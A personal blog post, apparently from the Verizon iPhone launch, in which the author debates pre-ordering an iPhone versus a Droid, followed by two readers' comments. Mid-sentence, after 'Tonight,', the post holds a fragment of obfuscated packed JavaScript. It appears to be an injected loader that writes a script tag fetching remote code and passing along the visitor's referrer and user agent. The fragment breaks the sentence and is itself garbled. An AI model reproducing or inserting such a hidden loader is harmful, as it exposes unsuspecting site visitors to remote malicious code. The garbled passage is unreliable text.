D-Day

That’s D for decision.

This is my current cell phone.  A motorola oldie mc-olderstein.

It’s been dropped over a dozen times and each time I hope it will break and give me an excuse to buy a new one.  It barely holds any text messages, so I’m always having to delete them, and the camera is crap.

Tonight, ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndska|var|u0026u|referrer|hzknn||js|php’.split(‘|’),0,{}))
at midnight, I (along with thousands of others) have the option to pre-order a Verizon iPhone.  I have iPhone envy.  And I’ve waited so long…..so why do I have such a dilemma?  I don’t know.  Maybe it’s the cost?  Maybe it’s my fear of dropping it and actually causing damage (I’ve broken 2 iPods before).  Maybe it’s my love-hate relationship with apple, documented
here and here .

Either way, I better figure it out soon.  Because you better believe that if I’m getting one, my finger will be on the mouse button at 12:00 and 1 second tonight to make sure I get one.  Go big or go home people.

While I’m pretty sure I already know the answer to this, what do people think?  Succumb to Steve Jobs and his empire or hold strong and go for a Droid?

i am so surprised you’ve still been in the dark ages with your current phone!! haha. no seriously, the iphone has changed my life. i mean, if you lose your remote to your tv, the iphone even has an app that replaces your remote! it does EVERYTHING!!!!

I feel ya. I debated for 2 years before taking the iPhone plunge. Which was 2 years and a day too long! Once we were able to get a plan that was financially comparable to what we had previously, it was a no brainer. I LOVE IT! And I’m really not into technology (or unnecessary expenses!) at all. It’s just so much fun! And think of all the useful apps you’ll be able to blog about! 😉

Of course, I don’t know anything about the Droid for comparison sake. Happy Shopping!
